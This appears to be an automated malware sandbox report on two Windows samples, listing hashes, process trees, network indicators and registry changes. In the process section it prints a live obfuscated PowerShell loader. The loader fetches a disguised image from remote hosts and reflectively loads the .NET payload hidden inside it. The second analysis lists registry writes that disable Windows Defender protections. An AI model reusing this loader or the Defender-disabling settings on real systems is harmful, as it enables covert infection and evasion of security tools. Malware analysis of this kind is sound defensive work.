SHA256 8f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27
SHA512 7d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16

\??\pipe\LOCAL\crashpad_4048_NYEMDOTVAYUBLUHT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25f87986bcd72dd045d9b8618fb48592
SHA1 c2d9b4ec955b8840027ff6fd6c1f636578fef7b5
SHA256 d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c
SHA512 0c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 dbb24d164504f325a569b4717af3f34b
SHA1 8646eae93c8874139d5a1a1272bcce3d2335eeb1
SHA256 8a894748357645eb16ef5bcd6ee0acfbb4dfb278bc5e362ac0081d5fd4317fa7
SHA512 af0552ebde3aa89446fc2051518f983624e1f40560642a8d9d495afee86c20e775801a0c703a21c63785840fc90b8de06d6b3dab3b06487497ca9e281376aa9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ad50a53fe7b005cef48df60ef8bd2469
SHA1 7ec7b557dfde99473f9b379a4ca7583f4976a374
SHA256 80feb7d6ba4736405a37d5dff1abf624ad30f246e4b60caf739c2258ac9a3a50
SHA512 7c2059614def99438781a3ae0c77fe0519a2fcf9b021bf5f08b34253cc41dc4239b802a1668144ed6c6229c419df75d9d307e6d2fa5fd569005209207abc69aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 690ac393efa65c81b05787f038874229
SHA1 db338df0a274fb22f127b4e073da1efae754c15e
SHA256 d6e60bec2996040b9639f936d124aa6b33a543e9b4e4a9b8c482a596683545e0
SHA512 fddfe8ac715bd2158e69b26f00777a30b46b02287c1c6d3fb495f8463c3220844d62798430fbf05abb3fce3084cbe82c039cf2753969604f30a0f2e74c4b0782

Analysis: behavioral24

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1484 set thread context of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Windows\SYSTEM32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4060 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 4060 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 3552 wrote to memory of 1856 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 3552 wrote to memory of 1856 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 1856 wrote to memory of 888 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 888 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c 67bcef97a5ffe.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GY@ZwBo@Gg@a@Bo@Gg@a@Bo@C8@dgBk@GY@ZgBn@GQ@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@
d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@g@D0@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@FM@dQBi@HM@d@By@Gk@bgBn@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Cw@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@HQ@ZQB4@HQ@I@@9@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@Ow@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@
Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@Gs@ZgBt@GE@agBy@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gkfmajr/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ofice365.github.io udp
US 185.199.110.153:443 ofice365.github.io tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
GB 92.123.128.152:443 www.bing.com tcp
DE 62.60.226.112:80 62.60.226.112 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs

MD5 e8b52173ea80a3b35b476222cef45835
SHA1 492bbd503f6ac03375104e5e0ec16095117732da
SHA256 15b1f23eff2c505506e6b434806d2ee0b22a6b7bade8e6760225cc36f1e4af06
SHA512 814a971f4dd36d5983dd768560032701fd5c0b19eda5d88beb5079793f4b6eb02cdfb52f2ac90a1d5293b1b2e421e09e98e5ae78150bffc4f577a65e059fbc10

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tj1rh1cl.yv4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/888-13-0x0000025D902B0000-0x0000025D902D2000-memory.dmp

memory/1484-23-0x000001A780090000-0x000001A7800A8000-memory.dmp

memory/4176-24-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4176-27-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Analysis: behavioral26

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
